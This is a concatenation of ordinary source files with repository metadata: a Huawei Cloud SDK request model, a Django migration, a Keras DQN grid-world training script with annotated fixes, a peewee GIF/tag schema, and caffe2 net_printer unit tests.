        Whether synchronization is at database level.

        :param sync_database: The sync_database of this UpdateDatabaseObjectReq.
        :type: bool
        """
        self._sync_database = sync_database

    @property
    def job(self):
        """Gets the job of this UpdateDatabaseObjectReq.

        Database object selection info; required when selected is true.

        :return: The job of this UpdateDatabaseObjectReq.
        :rtype: list[DatabaseInfo]
        """
        return self._job

    @job.setter
    def job(self, job):
        """Sets the job of this UpdateDatabaseObjectReq.

        Database object selection info; required when selected is true.

        :param job: The job of this UpdateDatabaseObjectReq.
        :type: list[DatabaseInfo]
        """
        self._job = job

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                # Recursively serialize model elements inside lists.
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                # Recursively serialize model values inside dicts.
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                if attr in self.sensitive_list:
                    result[attr] = "****"  # never expose sensitive values
                else:
                    result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        import simplejson as json
        if six.PY2:
            # Python 2 workaround: force UTF-8 as the default encoding so
            # non-ASCII field values serialize without UnicodeDecodeError.
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")
        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)

    def __repr__(self):
        """For `print`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, UpdateDatabaseObjectReq):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
b666560c3dfc850b210b32f9e91c4eaeb335a8c9 | 717ee3e48eeffcfb23a39c3401fab97881e00fe2 | /imate/chats/migrations/0003_randomchat.py | ef1423fd9b992122ee63235ac39d6f4ab3acd987 | [] | no_license | cryptic-pr03/iMate | e40a76e792ec0cd5dd1f37175404feef0336c536 | 0a9764ef78d3772faf9299ae8c516b1b7c92504f | refs/heads/main | 2023-08-30T12:56:54.918083 | 2021-11-16T06:20:37 | 2021-11-16T06:20:37 | 418,390,421 | 0 | 1 | null | 2021-11-16T05:19:57 | 2021-10-18T07:27:03 | Python | UTF-8 | Python | false | false | 760 | py | # Generated by Django 3.2.9 on 2021-11-12 19:39
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Create the RandomChat model: one row per user (OneToOne primary key
    onto auth.User) tracking whether the user is currently paired and the
    id of the random-chat room they are in."""

    dependencies = [
        ('auth', '0012_alter_user_first_name_max_length'),
        ('chats', '0002_message_isread'),
    ]

    operations = [
        migrations.CreateModel(
            name='RandomChat',
            fields=[
                # The user is the primary key, so each user has at most one
                # random-chat record; reachable as user.randomChatData.
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, related_name='randomChatData', serialize=False, to='auth.user')),
                ('isPaired', models.BooleanField(default=False)),
                ('RandomChatId', models.CharField(blank=True, max_length=10, null=True)),
            ],
        ),
    ]
| [
"73387559+iDeepverma@users.noreply.github.com"
] | 73387559+iDeepverma@users.noreply.github.com |
ae35cbada08ee521c9e85c146f2064540ce87c83 | fd3c67d988d31b8f1aecfb438a3b14b35d692066 | /Q Learning Sentdex/dqn.py | 5fbeff51e0cc18d3be1f5a34bcb1324930838170 | [] | no_license | iamycee/RL-Algorithms-Tensorflow | c16bf99059bb2369b07384ea16b4406410d141c7 | c9c6ac66e11b41fe79d0af1a04cd894cb85d6906 | refs/heads/master | 2020-05-22T16:01:21.176081 | 2019-07-04T12:33:49 | 2019-07-04T12:33:49 | 186,418,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,101 | py | from keras.models import Sequential
from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten
from keras.callbacks import TensorBoard
from keras.optimizers import Adam
from collections import deque
import numpy as np
import time
import random
from tqdm import tqdm
import os
from PIL import Image
import cv2
# --- DQN hyper-parameters ---
REPLAY_MEMORY_SIZE = 50_000  # max transitions kept in the replay buffer
MIN_REPLAY_MEMORY_SIZE = 1_000  # don't train until this many transitions exist
MODEL_NAME = '256x2'  # tag used for saved models / log dirs
DISCOUNT = 0.99  # future-reward discount factor (gamma)
MINIBATCH_SIZE = 64  # transitions sampled per training step
UPDATE_TARGET_EVERY = 5  # sync target net after this many terminal episodes
MIN_REWARD = -200  # For model save
MEMORY_FRACTION = 0.20  # GPU memory fraction -- not referenced here, TODO confirm use
# Own Tensorboard class
class ModifiedTensorBoard(TensorBoard):
    """Keras TensorBoard callback adapted for DQN training: keeps one log
    writer and a manually-advanced step counter across the many short
    .fit() calls, instead of opening a new log at step 0 every fit.

    NOTE(review): uses ``tf.summary.FileWriter`` but ``tf`` is not imported
    in this file -- confirm an ``import tensorflow as tf`` exists upstream.
    """

    # Overriding init to set initial step and writer (we want one log file for all .fit() calls)
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.step = 1
        self.writer = tf.summary.FileWriter(self.log_dir)

    # Overriding this method to stop creating default log writer
    def set_model(self, model):
        pass

    # Overrided, saves logs with our step number
    # (otherwise every .fit() will start writing from 0th step)
    def on_epoch_end(self, epoch, logs=None):
        self.update_stats(**logs)

    # Overrided
    # We train for one batch only, no need to save anything at epoch end
    def on_batch_end(self, batch, logs=None):
        pass

    # Overrided, so won't close writer
    def on_train_end(self, _):
        pass

    # Custom method for saving own metrics
    # Creates writer, writes custom metrics and closes writer
    def update_stats(self, **stats):
        self._write_logs(stats, self.step)
class DQNAgent:
    """DQN agent with separate online and target networks.

    The online ``model`` is trained every step on minibatches drawn from a
    replay buffer; the ``target_model`` only serves predictions of
    next-state Q values and is re-synced with the online weights every
    ``UPDATE_TARGET_EVERY`` terminal episodes, keeping the regression
    targets stable.
    """

    def __init__(self):
        # Main model: trained every step.
        # BUG FIX: the original assigned ``self.creatmodel.add(...)`` with a
        # pasted fragment of create_model's body, which could never run.
        self.model = self.create_model()

        # Target network: used only for .predict() of next-state Q values.
        self.target_model = self.create_model()
        self.target_model.set_weights(self.model.get_weights())

        # Replay buffer of (state, action, reward, new_state, done) tuples.
        # BUG FIX: the keyword is ``maxlen``; ``maxLen`` raises TypeError.
        self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE)

        # Single TensorBoard writer shared by all .fit() calls; the training
        # loop references ``agent.tensorboard``, so it must exist.
        self.tensorboard = ModifiedTensorBoard(
            log_dir="logs/{}-{}".format(MODEL_NAME, int(time.time())))

        # Counts terminal episodes since the target net was last synced.
        self.target_update_counter = 0

    def create_model(self):
        """Build the convolutional Q network mapping an RGB board image to
        one Q value per action."""
        model = Sequential()

        # BUG FIX: BlobEnv exposes OBSERVATION_SPACE_VALUES / ACTION_SPACE_SIZE;
        # the original used gym-style ``env.observation_space.n`` /
        # ``env.action_space.n``, which BlobEnv does not define.  Stray
        # duplicated ``model.add`` lines after ``return`` were removed.
        model.add(Conv2D(256, (3, 3), input_shape=env.OBSERVATION_SPACE_VALUES))
        model.add(Activation('relu'))
        model.add(MaxPooling2D(2, 2))
        model.add(Dropout(0.2))

        model.add(Conv2D(256, (3, 3)))
        model.add(Activation('relu'))
        model.add(MaxPooling2D(2, 2))
        model.add(Dropout(0.2))

        model.add(Flatten())
        model.add(Dense(64))
        model.add(Dense(env.ACTION_SPACE_SIZE, activation='linear'))

        model.compile(loss='mse',
                      optimizer=Adam(lr=0.001),
                      metrics=['accuracy'])
        return model

    def update_replay_memory(self, transition):
        """Store a (state, action, reward, new_state, done) transition."""
        self.replay_memory.append(transition)

    def get_qs(self, state, step=None):
        """Return the online network's Q values for *state* (pixels scaled
        to [0, 1]).

        ``step`` is unused; it defaults to None so the single-argument call
        made by the training loop works while old two-argument callers
        remain compatible.
        """
        return self.model.predict(
            np.array(state).reshape(-1, *state.shape) / 255)[0]

    def train(self, terminal_state, step):
        """Sample a minibatch from replay memory and fit the online network;
        sync the target network after every UPDATE_TARGET_EVERY terminal
        episodes."""
        # Only start training once the buffer holds enough transitions.
        if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE:
            return

        minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE)

        # Q values of current states from the online network.
        current_states = np.array([transition[0]
                                   for transition in minibatch]) / 255
        current_qs_list = self.model.predict(current_states)

        # Q values of successor states from the (frozen) target network.
        new_current_states = np.array(
            [transition[3] for transition in minibatch]) / 255
        future_qs_list = self.target_model.predict(new_current_states)

        X = []  # input states
        y = []  # corresponding Q-value targets

        for index, (current_state, action, reward, new_current_state,
                    done) in enumerate(minibatch):
            if not done:
                # Bellman target: r + gamma * max_a' Q_target(s', a').
                max_future_q = np.max(future_qs_list[index])
                new_q = reward + DISCOUNT * max_future_q
            else:
                new_q = reward  # terminal state: no future reward

            # Update only the taken action's Q value.
            current_qs = current_qs_list[index]
            current_qs[action] = new_q

            X.append(current_state)
            y.append(current_qs)

        # Fit on all samples as one batch; log to TensorBoard only on
        # terminal steps to keep the log compact.
        self.model.fit(np.array(X) / 255,
                       np.array(y),
                       batch_size=MINIBATCH_SIZE,
                       verbose=0,
                       shuffle=False,
                       callbacks=[self.tensorboard] if terminal_state else None)

        # BUG FIX: the original had stray pasted ``model.add`` lines here.
        if terminal_state:
            self.target_update_counter += 1

        # Periodically copy online weights into the target network.
        if self.target_update_counter > UPDATE_TARGET_EVERY:
            self.target_model.set_weights(self.model.get_weights())
            self.target_update_counter = 0
class Blob:
    """A point agent on a ``size`` x ``size`` grid, spawned at a random cell.

    Supports 9 discrete actions (the 8 king moves plus "stand still"),
    positional subtraction (returns an (dx, dy) tuple) and positional
    equality.
    """

    def __init__(self, size):
        self.size = size
        self.x = np.random.randint(0, size)
        self.y = np.random.randint(0, size)

    def __str__(self):
        return f"Blob ({self.x}, {self.y})"

    def __sub__(self, other):
        # Relative offset of self from other.
        return (self.x - other.x, self.y - other.y)

    def __eq__(self, other):
        # Two blobs are "equal" when they occupy the same cell.
        return self.x == other.x and self.y == other.y

    def action(self, choice):
        '''
        Gives us 9 total movement options. (0,1,2,3,4,5,6,7,8)
        Choice 8 is "stand still".
        '''
        deltas = {
            0: (1, 1), 1: (-1, -1), 2: (-1, 1), 3: (1, -1),
            4: (1, 0), 5: (-1, 0), 6: (0, 1), 7: (0, -1), 8: (0, 0),
        }
        dx, dy = deltas[choice]
        self.move(x=dx, y=dy)

    def move(self, x=None, y=None):
        """Shift by (x, y), moving randomly on any axis left unspecified.

        BUG FIX: the original used ``x=False`` defaults with ``if not x:``,
        so an explicit 0 delta (actions 4-8) was treated as "move randomly"
        instead of "don't move on this axis".  A ``None`` sentinel fixes
        that while keeping ``move()`` with no arguments fully random.
        """
        if x is None:
            self.x += np.random.randint(-1, 2)
        else:
            self.x += x

        if y is None:
            self.y += np.random.randint(-1, 2)
        else:
            self.y += y

        # Clamp to the grid.
        if self.x < 0:
            self.x = 0
        elif self.x > self.size - 1:
            self.x = self.size - 1
        if self.y < 0:
            self.y = 0
        elif self.y > self.size - 1:
            self.y = self.size - 1
class BlobEnv:
    """Minimal grid-world: a player blob must reach the food blob while
    avoiding the enemy blob on a SIZE x SIZE board.  Observations are
    either RGB images of the board or coordinate deltas, depending on
    RETURN_IMAGES."""
    SIZE = 10
    RETURN_IMAGES = True  # observations are RGB board images, not deltas
    MOVE_PENALTY = 1
    ENEMY_PENALTY = 300
    FOOD_REWARD = 25
    OBSERVATION_SPACE_VALUES = (SIZE, SIZE, 3)  # 4
    ACTION_SPACE_SIZE = 9
    PLAYER_N = 1  # player key in dict
    FOOD_N = 2  # food key in dict
    ENEMY_N = 3  # enemy key in dict
    # the dict! (colors) -- channel tuples used when painting the board image
    d = {1: (255, 175, 0), 2: (0, 255, 0), 3: (0, 0, 255)}

    def reset(self):
        # Respawn all three blobs on distinct cells and return the first
        # observation of the new episode.
        self.player = Blob(self.SIZE)
        self.food = Blob(self.SIZE)
        while self.food == self.player:
            self.food = Blob(self.SIZE)
        self.enemy = Blob(self.SIZE)
        while self.enemy == self.player or self.enemy == self.food:
            self.enemy = Blob(self.SIZE)

        self.episode_step = 0

        if self.RETURN_IMAGES:
            observation = np.array(self.get_image())
        else:
            observation = (self.player - self.food) + (self.player -
                                                       self.enemy)
        return observation

    def step(self, action):
        # Apply the player's action; food/enemy stay put (see MAYBE below).
        # Returns (observation, reward, done); episodes also end after 200 steps.
        self.episode_step += 1
        self.player.action(action)

        #### MAYBE ###
        #enemy.move()
        #food.move()
        ##############

        if self.RETURN_IMAGES:
            new_observation = np.array(self.get_image())
        else:
            new_observation = (self.player - self.food) + (self.player -
                                                           self.enemy)

        if self.player == self.enemy:
            reward = -self.ENEMY_PENALTY
        elif self.player == self.food:
            reward = self.FOOD_REWARD
        else:
            reward = -self.MOVE_PENALTY  # small cost per step encourages speed

        done = False
        if reward == self.FOOD_REWARD or reward == -self.ENEMY_PENALTY or self.episode_step >= 200:
            done = True

        return new_observation, reward, done

    def render(self):
        # Display the board image in an OpenCV window (scaled up for humans).
        img = self.get_image()
        img = img.resize(
            (300, 300))  # resizing so we can see our agent in all its glory.
        cv2.imshow("image", np.array(img))  # show it!
        cv2.waitKey(1)

    # FOR CNN #
    def get_image(self):
        # Paint the three blobs onto a SIZE x SIZE x 3 uint8 array and wrap
        # it in a PIL image.
        env = np.zeros((self.SIZE, self.SIZE, 3),
                       dtype=np.uint8)  # starts an rbg of our size
        env[self.food.x][self.food.y] = self.d[
            self.FOOD_N]  # sets the food location tile to green color
        env[self.enemy.x][self.enemy.y] = self.d[
            self.ENEMY_N]  # sets the enemy location to red
        env[self.player.x][self.player.y] = self.d[
            self.PLAYER_N]  # sets the player tile to blue
        img = Image.fromarray(
            env, 'RGB'
        )  # reading to rgb. Apparently. Even tho color definitions are bgr. ???
        return img
# --- Training driver: epsilon-greedy episode loop with stats/model saving ---
# NOTE(review): several names used below (tf, EPISODES, epsilon,
# EPSILON_DECAY, MIN_EPSILON, SHOW_PREVIEW, AGGREGATE_STATS_EVERY) are not
# defined in this file as shown -- confirm they are defined upstream.
env = BlobEnv()

ep_rewards = [-200]  # seeded so aggregate stats have something to average

# Fixed seeds for repeatable runs.
random.seed(1)
np.random.seed(1)
tf.set_random_seed(1)

if not os.path.isdir('models'):
    os.makedirs('models')

#Make agent interact with the environment
agent = DQNAgent()

for episode in tqdm(range(1, EPISODES + 1), ascii=True, unit='episodes'):
    agent.tensorboard.step = episode  # keep TensorBoard's x-axis on episodes

    episode_reward = 0
    step = 1
    current_state = env.reset()

    done = False

    while not done:
        # Epsilon-greedy action selection.
        if np.random.random() > epsilon:
            action = np.argmax(agent.get_qs(current_state))
        else:
            action = np.random.randint(
                0, env.ACTION_SPACE_SIZE
            )  #take random action with epsilon probability

        new_state, reward, done = env.step(action)
        episode_reward += reward

        if SHOW_PREVIEW and not episode % AGGREGATE_STATS_EVERY:
            env.render()

        # Store the transition and do one training step.
        agent.update_replay_memory(
            (current_state, action, reward, new_state, done))
        agent.train(done, step)

        current_state = new_state
        step += 1

    # Append episode reward to a list and log stats (every given number of episodes)
    ep_rewards.append(episode_reward)
    if not episode % AGGREGATE_STATS_EVERY or episode == 1:
        average_reward = sum(ep_rewards[-AGGREGATE_STATS_EVERY:]) / len(
            ep_rewards[-AGGREGATE_STATS_EVERY:])
        min_reward = min(ep_rewards[-AGGREGATE_STATS_EVERY:])
        max_reward = max(ep_rewards[-AGGREGATE_STATS_EVERY:])
        agent.tensorboard.update_stats(reward_avg=average_reward,
                                       reward_min=min_reward,
                                       reward_max=max_reward,
                                       epsilon=epsilon)

        # Save model, but only when min reward is greater or equal a set value
        # NOTE(review): the guard compares *average_reward* to MIN_REWARD,
        # not min_reward as the comment suggests -- confirm intent.
        if average_reward >= MIN_REWARD:
            agent.model.save(
                f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model'
            )

    # Decay exploration, never dropping below the floor.
    if epsilon > MIN_EPSILON:
        epsilon *= EPSILON_DECAY
        epsilon = max(MIN_EPSILON, epsilon)
"yashch.1210@gmail.com"
] | yashch.1210@gmail.com |
3a3c9cb0ae78a1a9de92c0c133fac3c98c5997ff | 443c5305b7df00dff9a7f89906fbb362be3bb334 | /db.py | abc2ad94000afc1a22ce8b71e858ba0c6016a866 | [] | no_license | oliverh100/giphyClone | 30feab387ee97b6dc84c67ca6b615a468fc9d7e1 | 36570b97e66e71af11e29fcf423e08ddbb2c0dfc | refs/heads/master | 2022-12-09T07:24:54.150254 | 2019-06-28T15:11:39 | 2019-06-28T15:11:39 | 193,688,589 | 0 | 0 | null | 2022-12-03T22:27:05 | 2019-06-25T10:42:50 | Python | UTF-8 | Python | false | false | 568 | py | from peewee import *
db = SqliteDatabase('static/gifs.db')
class gif(Model):
    """A stored GIF, identified by its filename (table ``gif2``)."""
    filename = CharField()

    class Meta:
        database = db
        db_table = 'gif2'
# Deferred through-model placeholder so the M2M below can reference the
# ``link`` table before its class is defined (resolved via set_model later).
defered_link = DeferredThroughModel()


class tags(Model):
    """A tag; many-to-many with ``gif`` through ``link`` (table ``tags2``)."""
    tag = CharField()
    gifs = ManyToManyField(gif, backref='tags', through_model=defered_link)

    class Meta:
        database = db
        db_table = 'tags2'
class link(Model):
    """Explicit join table connecting gifs and tags."""
    gif = ForeignKeyField(gif, backref = 'tag_links')
    tag = ForeignKeyField(tags, backref = 'gif_links')

    class Meta:
        database = db
        db_table = 'link'


# Resolve the deferred through-model now that ``link`` exists.
defered_link.set_model(link)
| [
"oliverh100@gmail.com"
] | oliverh100@gmail.com |
3642d4130b2a6948154873329d6f8ed1f4a69df7 | 4f408d65db60911f56110c351cb3b64835e0c5fb | /caffe2/python/net_printer_test.py | 2d6f5a172326cc0d170bb65254e0db72b09f873c | [
"Apache-2.0",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] | permissive | KeyKy/caffe2_SSD | a02c065aef2dbcfd00faae8be0440d7a4ff0fb76 | 7235688ea5e212dbe8609d780dd94c8c7d9fef54 | refs/heads/master | 2021-09-18T14:36:11.247427 | 2018-07-10T09:59:35 | 2018-07-10T09:59:35 | 89,928,918 | 8 | 5 | null | 2018-07-27T02:14:38 | 2017-05-01T14:04:20 | Jupyter Notebook | UTF-8 | Python | false | false | 2,901 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import net_printer
from caffe2.python.checkpoint import Job
from caffe2.python.net_builder import ops
from caffe2.python.task import Task, final_output
import unittest
def example_loop():
    """Build a Task with nested loops and an If/Elif/Else chain; serves as a
    representative control-flow graph for the net_printer tests."""
    with Task():
        total = ops.Const(0)
        total_large = ops.Const(0)
        total_small = ops.Const(0)
        total_tiny = ops.Const(0)
        with ops.loop(10) as loop:
            outer = ops.Mul([loop.iter(), ops.Const(10)])
            with ops.loop(loop.iter()) as inner:
                val = ops.Add([outer, inner.iter()])
                # Bucket val into large (>=80), small (>=50) or tiny totals.
                with ops.If(ops.GE([val, ops.Const(80)])) as c:
                    ops.Add([total_large, val], [total_large])
                with c.Elif(ops.GE([val, ops.Const(50)])) as c:
                    ops.Add([total_small, val], [total_small])
                with c.Else():
                    ops.Add([total_tiny, val], [total_tiny])
                ops.Add([total, val], total)
def example_task():
    """Build a Task exercising task_init/task_exit execution ordering and
    return its three final outputs (expected values: 6, 7 and 7)."""
    with Task():
        with ops.task_init():
            one = ops.Const(1)
        two = ops.Add([one, one])
        with ops.task_init():
            three = ops.Const(3)
        accum = ops.Add([two, three])
        # here, accum should be 5
        with ops.task_exit():
            # here, accum should be 6, since this executes after lines below
            seven_1 = ops.Add([accum, one])
        six = ops.Add([accum, one])
        ops.Add([accum, one], [accum])
        seven_2 = ops.Add([accum, one])
        o6 = final_output(six)
        o7_1 = final_output(seven_1)
        o7_2 = final_output(seven_2)
    return o6, o7_1, o7_2
def example_job():
    """Return a Job whose init group runs the loop and task examples above;
    used as the fixture for all TestNetPrinter cases."""
    with Job() as job:
        with job.init_group:
            example_loop()
        example_task()
    return job
class TestNetPrinter(unittest.TestCase):
    """Sanity checks for net_printer.to_string and net_printer.analyze."""

    def test_print(self):
        # Rendering the example job should produce non-empty text.
        self.assertTrue(len(net_printer.to_string(example_job())) > 0)

    def test_valid_job(self):
        job = example_job()
        with job:
            with Task():
                # distributed_ctx_init_* ignored by analyzer
                ops.Add(['distributed_ctx_init_a', 'distributed_ctx_init_b'])
        # A well-formed job passes analysis without raising.
        net_printer.analyze(example_job())

    def test_undefined_blob(self):
        # Consuming blobs 'a'/'b' that were never produced must be rejected.
        job = example_job()
        with job:
            with Task():
                ops.Add(['a', 'b'])
        with self.assertRaises(AssertionError):
            net_printer.analyze(job)

    def test_multiple_definition(self):
        # Two separate tasks writing the same output blob must be rejected.
        job = example_job()
        with job:
            with Task():
                ops.Add([ops.Const(0), ops.Const(1)], 'out1')
            with Task():
                ops.Add([ops.Const(2), ops.Const(3)], 'out1')
        with self.assertRaises(AssertionError):
            net_printer.analyze(job)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.